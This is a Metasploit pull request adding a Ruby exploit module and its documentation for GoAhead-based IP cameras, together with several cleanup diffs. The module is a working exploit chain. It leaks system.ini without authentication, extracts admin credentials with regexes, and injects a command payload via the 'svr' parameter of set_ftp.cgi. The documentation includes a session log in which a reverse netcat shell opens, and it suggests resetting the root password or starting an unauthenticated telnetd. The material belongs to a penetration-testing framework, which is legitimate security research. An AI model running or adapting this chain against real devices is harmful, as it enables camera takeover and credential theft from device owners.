### PR TITLE
1250+ Ip camera models rce with creds leak

### DIFF
--- a/documentation/modules/exploit/linux/http/ipcam_rce_with_creds_leak.md
+++ b/documentation/modules/exploit/linux/http/ipcam_rce_with_creds_leak.md
@@ -1,20 +1,61 @@
 ## Vulnerable Application
-  This module exploits an authenticated remote code execution in various branded ip cameras based on the same chinese OEM model.
-  Those cameras are also vulnerable to a badly implemented check on system.ini file within the embedded GoAhead web server.
+  This module exploits an authenticated remote code execution in various branded IP cameras based on the same chinese OEM model.
+  Those cameras are also vulnerable to a badly implemented check on `system.ini` file within the embedded GoAhead web server.
   By combining the two vulnerabilities, it is possible to achieve code execution without prior knowledge of any credentials.
-  1250+ Cameras models have been found vulnerable so far.
+  [1250+ Cameras models](https://web.archive.org/web/20170308122943/https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html) have been found vulnerable so far.
   While the credential leak is pretty reliable, a smaller subset of those cameras have netcat available.
   Others have a smaller payload size or tend to mangle some characters on longer strings.
-  Using a generic command payload to start a telnetd or change root password may be more suitable in those cases.
+  Using a generic command payload to start telnetd or change root password may be more suitable in those cases.
 
 ## Verification Steps
+  1. Start msfconsole
+  2. Do: `use exploit/linux/http/ipcam_rce_with_creds_leak`
+  3. Do: `set rhost`
+  4. Do: `set rport`
+  5. Do: `set payload`
+  6. Do: `set lhost`
+  7. Do: `exploit`
+
+## Options
+  **PAYLOAD**
+
+  The `generic` and `netcat-e` payload types are valid. If the netcat-e does not provide a shell this surely means that nc binary is not provided within the firmware
+  or the nc symlink to busybox is not present.
+  In that case use a generic command to change the root password, spawn a new unauthenticated telnetd daemon or anything else.
+
+  Payload space is a real issue to deal with. The payload space is in theory 60 chars. when calling set_ftp.cgi the payload will be handled directly by the
+  GoAhead server binary named 'encoder' on most models. Depending on the model the payload can be mangled when non word characters are used and/or size is above some threshold.
+  A good compromise is to use a payload space of 45 which seems to works correctly on several models tested. It is possible to verify if the payload has been mangled
+  by downloading system.ini again after execution attempt (set GATHER_CREDS_ONLY true) and manually analyzing it. The payload should be fully located in the binary file.
+
+
+  **GATHER_CREDS_ONLY**
+
+  Use this options to only download `system.ini` and extract credentials without attempting code execution.
+
+  **USERNAME**
+
+  Use a predifined username for code execution by skipping credential leak attempt
+
+  **PASSWORD**
+
+  Use a predifined password when USERNAME is set
+
+## Scenarios
 ```
+  Model tested : Vstarcam c7824wip
+  Firmware Version : 48.50.72.77
+
   msf exploit(ipcam_rce_with_creds_leak) > set VERBOSE true
   VERBOSE => true
   msf exploit(ipcam_rce_with_creds_leak) > set RHOST 192.168.1.66
   RHOST => 192.168.1.66
   msf exploit(ipcam_rce_with_creds_leak) > set RPORT 81
   RPORT => 81
+  msf exploit(ipcam_rce_with_creds_leak) > set PAYLOAD cmd/unix/reverse_netcat_gaping
+  PAYLOAD => cmd/unix/reverse_netcat_gaping
+  msf exploit(ipcam_rce_with_creds_leak) > set LHOST 192.168.1.1
+  LHOST => 192.168.1.1
   msf exploit(ipcam_rce_with_creds_leak) > check
 
   [*] Sending check
@@ -32,28 +73,3 @@
   [*] Trying to trigger code execution with credentials: login: admin / password: test
   [*] Command shell session 2 opened (192.168.1.1:4444 -> 192.168.1.66:32412) at 2017-05-12 09:53:35 -0400
 ```
-## Options
-
-  **PAYLOAD**
-
-  The `generic` and `netcat-e` payload types are valid. If the netcat-e does not provide a shell this surely means that nc binary is not provided within the firmware
-  or the nc symlink to busybox is not present.
-  In that case use a generic command to change the root password, spawn a new unauthenticated telnetd daemon or anything else.
-
-  Payload space is a real issue to deal with. The payload space is in theory 60 chars. when calling set_ftp.cgi the payload will be handled directly by the
-  GoAhead server binary named 'encoder' on most models. Depending on the model the payload can be mangled when non word character are used and/or size is above some threshold.
-  A good compromise is to use a payload space of 45 which seems to works correctly on several model tested. It is possible to verify if the payload has been mangled
-  by downloading system.ini again after execution attempt (set GATHER_CREDS_ONLY true) and manually analyzing it. The payload should be fully located in the binary file. 
-
-
-  **GATHER_CREDS_ONLY**
-
-  Use this options to only download system.ini and extract credentials without attempting code execution.
-
-  **USERNAME**
-
-  Use a predifined username for code execution by skipping credential leak attempt
-
-  **PASSWORD**
-
-  Use a predifined password when USERNAME is set

--- a/documentation/modules/exploit/linux/http/ipcam_rce_with_creds_leak.md
+++ b/documentation/modules/exploit/linux/http/ipcam_rce_with_creds_leak.md
@@ -1,0 +1,59 @@
+## Vulnerable Application
+  This module exploits an authenticated remote code execution in various branded ip cameras based on the same chinese OEM model.
+  Those cameras are also vulnerable to a badly implemented check on system.ini file within the embedded GoAhead web server.
+  By combining the two vulnerabilities, it is possible to achieve code execution without prior knowledge of any credentials.
+  1250+ Cameras models have been found vulnerable so far.
+  While the credential leak is pretty reliable, a smaller subset of those cameras have netcat available.
+  Others have a smaller payload size or tend to mangle some characters on longer strings.
+  Using a generic command payload to start a telnetd or change root password may be more suitable in those cases.
+  
+## Verification Steps
+```
+  msf exploit(ipcam_rce_with_creds_leak) > set VERBOSE true
+  VERBOSE => true
+  msf exploit(ipcam_rce_with_creds_leak) > set RHOST 192.168.1.66
+  RHOST => 192.168.1.66
+  msf exploit(ipcam_rce_with_creds_leak) > set RPORT 81
+  RPORT => 81
+  msf exploit(ipcam_rce_with_creds_leak) > check
+
+  [*] Sending check
+  [+] Camera likely vulnerable: Correct header sent by the camera
+  [+] 192.168.1.66:81 The target is vulnerable.
+  msf exploit(ipcam_rce_with_creds_leak) > exploit
+
+  [*] Started reverse TCP handler on 192.168.1.1:4444 
+  [*] Trying to download system.ini
+  [*] 192.168.1.66:81 - Credentials saved in: /root/.msf4/loot/20170512095335_default_192.168.1.66_system.ini_421085.ini
+  [*] Trying to extract credentials
+  [+] Found 1 possible credentials
+  [+] login: admin / password: test
+  [!] No active DB -- Credential data will not be saved!
+  [*] Trying to trigger code execution with credentials: login: admin / password: test
+  [*] Command shell session 2 opened (192.168.1.1:4444 -> 192.168.1.66:32412) at 2017-05-12 09:53:35 -0400
+```
+## Options
+
+  **PAYLOAD**
+
+  The `generic` and `netcat-e` payload types are valid. If the netcat-e does not provide a shell this surely means that nc binary is not provided within the firmware
+  or the nc symlink to busybox is not present.
+  In that case use a generic command to change the root password, spawn a new unauthenticated telnetd daemon or anything else.
+  
+  Payload space is a real issue to deal with. The payload space is in theory 60 chars. when calling set_ftp.cgi the payload will be handled directly by the 
+  GoAhead server binary named 'encoder' on most models. Depending on the model the payload can be mangled when non word character are used and/or size is above some threshold.
+  A good compromise is to use a payload space of 45 which seems to works correctly on several model tested. It is possible to verify if the payload has been mangled
+  by downloading system.ini again after execution attempt (set GATHER_CREDS_ONLY true) and manually analyzing it. The payload should be fully located in the binary file.   
+
+
+  **GATHER_CREDS_ONLY**
+  
+  Use this options to only download system.ini and extract credentials without attempting code execution.
+  
+  **USERNAME**
+  
+  Use a predifined username for code execution by skipping credential leak attempt
+  
+  **PASSWORD**
+  
+  Use a predifined password when USERNAME is set

--- a/documentation/modules/exploit/linux/http/ipcam_rce_with_creds_leak.md
+++ b/documentation/modules/exploit/linux/http/ipcam_rce_with_creds_leak.md
@@ -6,7 +6,7 @@
   While the credential leak is pretty reliable, a smaller subset of those cameras have netcat available.
   Others have a smaller payload size or tend to mangle some characters on longer strings.
   Using a generic command payload to start a telnetd or change root password may be more suitable in those cases.
-  
+
 ## Verification Steps
 ```
   msf exploit(ipcam_rce_with_creds_leak) > set VERBOSE true
@@ -22,7 +22,7 @@
   [+] 192.168.1.66:81 The target is vulnerable.
   msf exploit(ipcam_rce_with_creds_leak) > exploit
 
-  [*] Started reverse TCP handler on 192.168.1.1:4444 
+  [*] Started reverse TCP handler on 192.168.1.1:4444
   [*] Trying to download system.ini
   [*] 192.168.1.66:81 - Credentials saved in: /root/.msf4/loot/20170512095335_default_192.168.1.66_system.ini_421085.ini
   [*] Trying to extract credentials
@@ -39,21 +39,21 @@
   The `generic` and `netcat-e` payload types are valid. If the netcat-e does not provide a shell this surely means that nc binary is not provided within the firmware
   or the nc symlink to busybox is not present.
   In that case use a generic command to change the root password, spawn a new unauthenticated telnetd daemon or anything else.
-  
-  Payload space is a real issue to deal with. The payload space is in theory 60 chars. when calling set_ftp.cgi the payload will be handled directly by the 
+
+  Payload space is a real issue to deal with. The payload space is in theory 60 chars. when calling set_ftp.cgi the payload will be handled directly by the
   GoAhead server binary named 'encoder' on most models. Depending on the model the payload can be mangled when non word character are used and/or size is above some threshold.
   A good compromise is to use a payload space of 45 which seems to works correctly on several model tested. It is possible to verify if the payload has been mangled
-  by downloading system.ini again after execution attempt (set GATHER_CREDS_ONLY true) and manually analyzing it. The payload should be fully located in the binary file.   
+  by downloading system.ini again after execution attempt (set GATHER_CREDS_ONLY true) and manually analyzing it. The payload should be fully located in the binary file. 
 
 
   **GATHER_CREDS_ONLY**
-  
+
   Use this options to only download system.ini and extract credentials without attempting code execution.
-  
+
   **USERNAME**
-  
+
   Use a predifined username for code execution by skipping credential leak attempt
-  
+
   **PASSWORD**
-  
+
   Use a predifined password when USERNAME is set

--- a/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
+++ b/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
@@ -23,14 +23,14 @@ class MetasploitModule < Msf::Exploit::Remote
         This module exploits an authenticated remote code execution in various branded ip cameras based on the same chinese OEM model.
         Those cameras are also vulnerable to a badly implemented check on system.ini file within the embedded GoAhead web server.
         By combining the two vulnerabilities, it is possible to achieve code execution without prior knowledge of any credentials.
-        1250+ Cameras models have been found vulnerable so far. 
-        While the credential leak is pretty reliable, a smaller subset of those cameras have netcat available. 
+        1250+ Cameras models have been found vulnerable so far.
+        While the credential leak is pretty reliable, a smaller subset of those cameras have netcat available.
         Others have a smaller payload size or tend to mangle some characters on longer strings.
         Using a generic command payload to start a telnetd or change root password may be more suitable in those cases.
       },
       'License'        => MSF_LICENSE,
-      'Author'      => 
-        [ 
+      'Author'      =>
+        [
           'pierrekim', # Discovery
           'amaloteaux' # msf module
         ],
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => '/',
         'method' => 'GET'
       })
-      if res.nil? 
+      if res.nil?
         vprint_error("No response from GET request while checking")
         return Exploit::CheckCode::Safe
       end
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
         vprint_error("Non 401 return code : #{res.code}")
         return Exploit::CheckCode::Safe
       end
-      
+
       unless res.headers["WWW-Authenticate"] =~ /realm=\"GoAhead\".*opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"/
         if res.headers["WWW-Authenticate"] =~ /realm=\"WIFICAM\".*opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"/
           vprint_warning("Camera may be vunerable : realm=WIFICAM found in the header")
@@ -95,10 +95,10 @@ class MetasploitModule < Msf::Exploit::Remote
           return Exploit::CheckCode::Safe
         end
       else
-        vprint_good("Camera likely vulnerable : Correct header sent by the camera")  
+        vprint_good("Camera likely vulnerable : Correct header sent by the camera")
         return Exploit::CheckCode::Vulnerable
       end
-	rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
       vprint_error("Error connecting to #{rhost}")
       return Exploit::CheckCode::Unknown
     end
@@ -109,17 +109,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @creds = []
     @skip_creds_leak = false
-        
+
     if not datastore["PASSWORD"].nil? and datastore["USERNAME"].nil?
       print_error("Inconsistent options : PASSWORD without USERNAME")
       return
     end
-    
+
     if datastore["GATHER_CREDS_ONLY"] and not datastore["USERNAME"].nil?
       print_error("Inconsistent options : GATHER_CREDS_ONLY with USERNAME")
       return
     end
-    
+
     if not datastore["USERNAME"].nil?
       @skip_creds_leak = true
       @creds[0] = {
@@ -153,32 +153,32 @@ class MetasploitModule < Msf::Exploit::Remote
         print_status("#{rhost}:#{rport} - Credentials saved in: #{p}")
 
         vprint_status("Trying to extract credentials")
-        
+
         admin_regexp = /\x00{5}admin\x00{27}[\w@#!-]{1,25}\x00{5}/
         blank_admin_regexp = /\x00{1}admin\x00{70}/
         anylogin_regexp = /\x00{5}(?=.{32}[\w@#!-]{1,15}\x00{5})[\w@#!-]{1,15}\x00{1,32}[\w@#!-]{1,15}\x00{5}/
-    
+
         if data =~ admin_regexp
           credsdata = data.scan(admin_regexp)[0].gsub(/\x00{5}admin[\x00]{1,27}/, "").gsub(/[\x00]{5}$/, "")
           @creds[0] = {}
-          @creds[0]["username"] = "admin" 
-          @creds[0]["password"] = credsdata 
-      
+          @creds[0]["username"] = "admin"
+          @creds[0]["password"] = credsdata
+
         elsif data =~ blank_admin_regexp
           @creds[0] = {}
           @creds[0]["username"] = "admin"
           @creds[0]["password"] = ""
-    
+
         elsif data =~ anylogin_regexp
           credsdata = data.scan(anylogin_regexp)
-          credsdata.length.times do |i| 
+          credsdata.length.times do |i|
             tmpcreds = credsdata[i].gsub(/^\x00{5}/, "").gsub(/\x00{5}/, "").gsub(/\x00+/, " ").scan(/[\w@#!-]{2,}/)
             @creds[i] = {}
             @creds[i]["username"] = tmpcreds[0]
             @creds[i]["password"] = tmpcreds[1]
           end
       end
-      
+
         if @creds.length > 0
           print_good("Found #{@creds.length} possible credentials")
           @creds.each do |c|
@@ -198,9 +198,9 @@ class MetasploitModule < Msf::Exploit::Remote
         if datastore["GATHER_CREDS_ONLY"]
           vprint_status("Stopping due to GATHER_CREDS_ONLY option")
           return
-        end 
+        end
       end
-    
+
       vprint_status("Trying to trigger code execution with credentials : login : #{@creds[0]["username"]} / password : #{@creds[0]["password"]}")
       res = send_request_cgi({
           'uri' => '/set_ftp.cgi',
@@ -218,7 +218,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'upload_interval' => '0'
           }
         })
-         
+
       #trigger
       res = send_request_cgi({
         'uri' => '/ftptest.cgi',
@@ -229,13 +229,13 @@ class MetasploitModule < Msf::Exploit::Remote
           'loginpas' => @creds[0]["password"]
         }
       })
-      
-	rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
+
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
       print_error("Error connecting to #{rhost}")
       return
     end
   end
-  
+
   def report_cred(opts)
     service_data = {
       address: opts[:ip],
@@ -257,7 +257,7 @@ class MetasploitModule < Msf::Exploit::Remote
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::UNTRIED,
     }.merge(service_data)
-    
+
     create_credential_login(login_data)
   end
 end

--- a/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
+++ b/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
@@ -3,11 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -16,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Ipcam authenticated remote code execution with creds leak",
+      'Name'           => "IPCam authenticated remote code execution with creds leak",
       'Description'    => %q{
         This module exploits an authenticated remote code execution in various branded ip cameras based on the same chinese OEM model.
         Those cameras are also vulnerable to a badly implemented check on system.ini file within the embedded GoAhead web server.
@@ -35,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['URL', 'https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html'],
+          ['URL', 'https://web.archive.org/web/20170308122943/https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html'], #list of models
           ['URL', 'https://jumpespjump.blogspot.nl/2015/09/how-i-hacked-my-ip-camera-and-found.html'],
           ['CVE', '2017-8225' ] #Pre-Auth Info Leak (credentials) within the custom http server
         ],
@@ -86,14 +82,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
       unless res.headers["WWW-Authenticate"] =~ /realm=\"GoAhead\".*opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"/
         if res.headers["WWW-Authenticate"] =~ /realm=\"WIFICAM\".*opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"/
-          vprint_warning("Camera may be vunerable : realm=WIFICAM found in the header")
+          vprint_warning("Camera may be vulnerable: realm=WIFICAM found in the header")
           return Exploit::CheckCode::Vulnerable
         else
-          vprint_error("Camera likely invulnerable : Wrong or no WWW-Authenticate header send by the camera")
+          vprint_error("Camera likely not vulnerable: Wrong or no WWW-Authenticate header sent by the camera")
           return Exploit::CheckCode::Safe
         end
       else
-        vprint_good("Camera likely vulnerable : Correct header sent by the camera")
+        vprint_good("Camera likely vulnerable: Correct header sent by the camera")
         return Exploit::CheckCode::Vulnerable
       end
     rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
@@ -109,12 +105,12 @@ class MetasploitModule < Msf::Exploit::Remote
     @skip_creds_leak = false
 
     if not datastore["PASSWORD"].nil? and datastore["USERNAME"].nil?
-      print_error("Inconsistent options : PASSWORD without USERNAME")
+      print_error("Inconsistent options: PASSWORD without USERNAME")
       return
     end
 
     if datastore["GATHER_CREDS_ONLY"] and not datastore["USERNAME"].nil?
-      print_error("Inconsistent options : GATHER_CREDS_ONLY with USERNAME")
+      print_error("Inconsistent options: GATHER_CREDS_ONLY with USERNAME")
       return
     end
 
@@ -139,11 +135,10 @@ class MetasploitModule < Msf::Exploit::Remote
         })
 
         if res.nil? then print_error("No response from GET request while retrieving system.ini"); return end
-        if res.code != 200 then print_error("Wrong return code while retrieving sysem.ini: #{res.code}"); return end
+        if res.code != 200 then print_error("Wrong return code while retrieving system.ini: #{res.code}"); return end
 
         data=res.body.force_encoding(Encoding::BINARY)
         loot_name     = 'system.ini'
-        #loot_type     = 'text/plain'
         loot_type     = 'application/octet-stream'
         loot_filename = 'system.ini'
         loot_desc     = 'ipcam raw information leak'
@@ -180,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
         if @creds.length > 0
           print_good("Found #{@creds.length} possible credentials")
           @creds.each do |c|
-            print_good("login : #{c["username"]} / password : #{c["password"]}")
+            print_good("login: #{c["username"]} / password: #{c["password"]}")
               report_cred(
                 ip: rhost,
                 port: rport,
@@ -199,8 +194,8 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       end
 
-      vprint_status("Trying to trigger code execution with credentials : login : #{@creds[0]["username"]} / password : #{@creds[0]["password"]}")
-      res = send_request_cgi({
+      vprint_status("Trying to trigger code execution with credentials: login: #{@creds[0]["username"]} / password: #{@creds[0]["password"]}")
+      send_request_cgi({
           'uri' => '/set_ftp.cgi',
           'method' => 'GET',
           'vars_get' => {

--- a/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
+++ b/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
         elsif data =~ anylogin_regexp
           credsdata = data.scan(anylogin_regexp)
           credsdata.length.times do |i|
-            tmpcreds = credsdata[i].gsub(/^\x00{5}/, "").gsub(/\x00{5}/, "").gsub(/\x00+/, " ").scan(/[\w@#!-]{2,}/)
+            tmpcreds = credsdata[i].gsub(/^\x00{5}/, "").gsub(/\x00{5}$/, "").gsub(/\x00+/, " ").scan(/[\w@#!-]{2,}/)
             @creds[i] = {}
             @creds[i]["username"] = tmpcreds[0]
             @creds[i]["password"] = tmpcreds[1]

--- a/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
+++ b/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
@@ -8,8 +8,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -66,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [false, 'Optional http username, setting it will prevent credential leak attempt']),
         OptString.new('PASSWORD', [false, 'Optional http username']),
         OptBool.new('GATHER_CREDS_ONLY', [true, 'Only gather credentials without attempting code exec', false])
-      ], self.class)
+      ])
   end
 
   def check

--- a/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
+++ b/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
@@ -13,13 +13,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "IPCam authenticated remote code execution with creds leak",
       'Description'    => %q{
-        This module exploits an authenticated remote code execution in various branded ip cameras based on the same chinese OEM model.
+        This module exploits an authenticated remote code execution in various branded IP cameras based on the same chinese OEM model.
         Those cameras are also vulnerable to a badly implemented check on system.ini file within the embedded GoAhead web server.
         By combining the two vulnerabilities, it is possible to achieve code execution without prior knowledge of any credentials.
         1250+ Cameras models have been found vulnerable so far.
         While the credential leak is pretty reliable, a smaller subset of those cameras have netcat available.
         Others have a smaller payload size or tend to mangle some characters on longer strings.
-        Using a generic command payload to start a telnetd or change root password may be more suitable in those cases.
+        Using a generic command payload to start telnetd or change root password may be more suitable in those cases.
       },
       'License'        => MSF_LICENSE,
       'Author'      =>

--- a/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
+++ b/modules/exploits/linux/http/ipcam_rce_with_creds_leak.rb
@@ -1,0 +1,264 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Ipcam authenticated remote code execution with creds leak",
+      'Description'    => %q{
+        This module exploits an authenticated remote code execution in various branded ip cameras based on the same chinese OEM model.
+        Those cameras are also vulnerable to a badly implemented check on system.ini file within the embedded GoAhead web server.
+        By combining the two vulnerabilities, it is possible to achieve code execution without prior knowledge of any credentials.
+        1250+ Cameras models have been found vulnerable so far. 
+        While the credential leak is pretty reliable, a smaller subset of those cameras have netcat available. 
+        Others have a smaller payload size or tend to mangle some characters on longer strings.
+        Using a generic command payload to start a telnetd or change root password may be more suitable in those cases.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'      => 
+        [ 
+          'pierrekim', # Discovery
+          'amaloteaux' # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html'],
+          ['URL', 'https://jumpespjump.blogspot.nl/2015/09/how-i-hacked-my-ip-camera-and-found.html'],
+          ['CVE', '2017-8225' ] #Pre-Auth Info Leak (credentials) within the custom http server
+        ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'       => 45,
+          'BadChars'    => "\x00\x0a\x0d",
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic netcat-e',
+            }
+        },
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Apr 25 2017",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Optional http username, setting it will prevent credential leak attempt']),
+        OptString.new('PASSWORD', [false, 'Optional http username']),
+        OptBool.new('GATHER_CREDS_ONLY', [true, 'Only gather credentials without attempting code exec', false])
+      ], self.class)
+  end
+
+  def check
+
+    vprint_status("Sending check")
+    begin
+      res = send_request_cgi({
+        'uri' => '/',
+        'method' => 'GET'
+      })
+      if res.nil? 
+        vprint_error("No response from GET request while checking")
+        return Exploit::CheckCode::Safe
+      end
+      if res.code != 401
+        vprint_error("Non 401 return code : #{res.code}")
+        return Exploit::CheckCode::Safe
+      end
+      
+      unless res.headers["WWW-Authenticate"] =~ /realm=\"GoAhead\".*opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"/
+        if res.headers["WWW-Authenticate"] =~ /realm=\"WIFICAM\".*opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"/
+          vprint_warning("Camera may be vunerable : realm=WIFICAM found in the header")
+          return Exploit::CheckCode::Vulnerable
+        else
+          vprint_error("Camera likely invulnerable : Wrong or no WWW-Authenticate header send by the camera")
+          return Exploit::CheckCode::Safe
+        end
+      else
+        vprint_good("Camera likely vulnerable : Correct header sent by the camera")  
+        return Exploit::CheckCode::Vulnerable
+      end
+	rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
+      vprint_error("Error connecting to #{rhost}")
+      return Exploit::CheckCode::Unknown
+    end
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+
+    @creds = []
+    @skip_creds_leak = false
+        
+    if not datastore["PASSWORD"].nil? and datastore["USERNAME"].nil?
+      print_error("Inconsistent options : PASSWORD without USERNAME")
+      return
+    end
+    
+    if datastore["GATHER_CREDS_ONLY"] and not datastore["USERNAME"].nil?
+      print_error("Inconsistent options : GATHER_CREDS_ONLY with USERNAME")
+      return
+    end
+    
+    if not datastore["USERNAME"].nil?
+      @skip_creds_leak = true
+      @creds[0] = {
+        "username" => datastore["USERNAME"],
+        "password" => datastore["PASSWORD"].nil? ? "" : datastore["PASSWORD"]
+      }
+    end
+
+    begin
+      unless @skip_creds_leak
+        vprint_status("Trying to download system.ini")
+        res = send_request_cgi({
+          'uri' => '/system.ini',
+          'method' => 'GET',
+          'vars_get' => {
+            'loginuse' => '',
+            'loginpas' => ''
+          }
+        })
+
+        if res.nil? then print_error("No response from GET request while retrieving system.ini"); return end
+        if res.code != 200 then print_error("Wrong return code while retrieving sysem.ini: #{res.code}"); return end
+
+        data=res.body.force_encoding(Encoding::BINARY)
+        loot_name     = 'system.ini'
+        #loot_type     = 'text/plain'
+        loot_type     = 'application/octet-stream'
+        loot_filename = 'system.ini'
+        loot_desc     = 'ipcam raw information leak'
+        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_filename, loot_desc)
+        print_status("#{rhost}:#{rport} - Credentials saved in: #{p}")
+
+        vprint_status("Trying to extract credentials")
+        
+        admin_regexp = /\x00{5}admin\x00{27}[\w@#!-]{1,25}\x00{5}/
+        blank_admin_regexp = /\x00{1}admin\x00{70}/
+        anylogin_regexp = /\x00{5}(?=.{32}[\w@#!-]{1,15}\x00{5})[\w@#!-]{1,15}\x00{1,32}[\w@#!-]{1,15}\x00{5}/
+    
+        if data =~ admin_regexp
+          credsdata = data.scan(admin_regexp)[0].gsub(/\x00{5}admin[\x00]{1,27}/, "").gsub(/[\x00]{5}$/, "")
+          @creds[0] = {}
+          @creds[0]["username"] = "admin" 
+          @creds[0]["password"] = credsdata 
+      
+        elsif data =~ blank_admin_regexp
+          @creds[0] = {}
+          @creds[0]["username"] = "admin"
+          @creds[0]["password"] = ""
+    
+        elsif data =~ anylogin_regexp
+          credsdata = data.scan(anylogin_regexp)
+          credsdata.length.times do |i| 
+            tmpcreds = credsdata[i].gsub(/^\x00{5}/, "").gsub(/\x00{5}/, "").gsub(/\x00+/, " ").scan(/[\w@#!-]{2,}/)
+            @creds[i] = {}
+            @creds[i]["username"] = tmpcreds[0]
+            @creds[i]["password"] = tmpcreds[1]
+          end
+      end
+      
+        if @creds.length > 0
+          print_good("Found #{@creds.length} possible credentials")
+          @creds.each do |c|
+            print_good("login : #{c["username"]} / password : #{c["password"]}")
+              report_cred(
+                ip: rhost,
+                port: rport,
+                user: c["username"],
+                password: c["password"],
+                service_name: (ssl ? "https" : "http")
+              )
+          end
+        else
+          print_error("Could not automatically extract any credentials from loot file, review it manually")
+          return
+        end
+        if datastore["GATHER_CREDS_ONLY"]
+          vprint_status("Stopping due to GATHER_CREDS_ONLY option")
+          return
+        end 
+      end
+    
+      vprint_status("Trying to trigger code execution with credentials : login : #{@creds[0]["username"]} / password : #{@creds[0]["password"]}")
+      res = send_request_cgi({
+          'uri' => '/set_ftp.cgi',
+          'method' => 'GET',
+          'vars_get' => {
+            'next_url' => 'ftp.htm',
+            'loginuse' => @creds[0]["username"],
+            'loginpas' => @creds[0]["password"],
+            'svr' => "$(#{payload.encoded.strip})",
+            'port' => 21,
+            'user' => 'ftp',
+            'pwd' => 'ftp',
+            'dir'=> '/',
+            'mode' => 0,
+            'upload_interval' => '0'
+          }
+        })
+         
+      #trigger
+      res = send_request_cgi({
+        'uri' => '/ftptest.cgi',
+        'method' => 'GET',
+        'vars_get' => {
+          'next_url' => 'test_ftp.htm',
+          'loginuse' => @creds[0]["username"],
+          'loginpas' => @creds[0]["password"]
+        }
+      })
+      
+	rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
+      print_error("Error connecting to #{rhost}")
+      return
+    end
+  end
+  
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password,
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+    
+    create_credential_login(login_data)
+  end
+end
+


### PR DESCRIPTION
This module exploit a cred leak + auth rce in various ip cameras based on a chinese oem model.
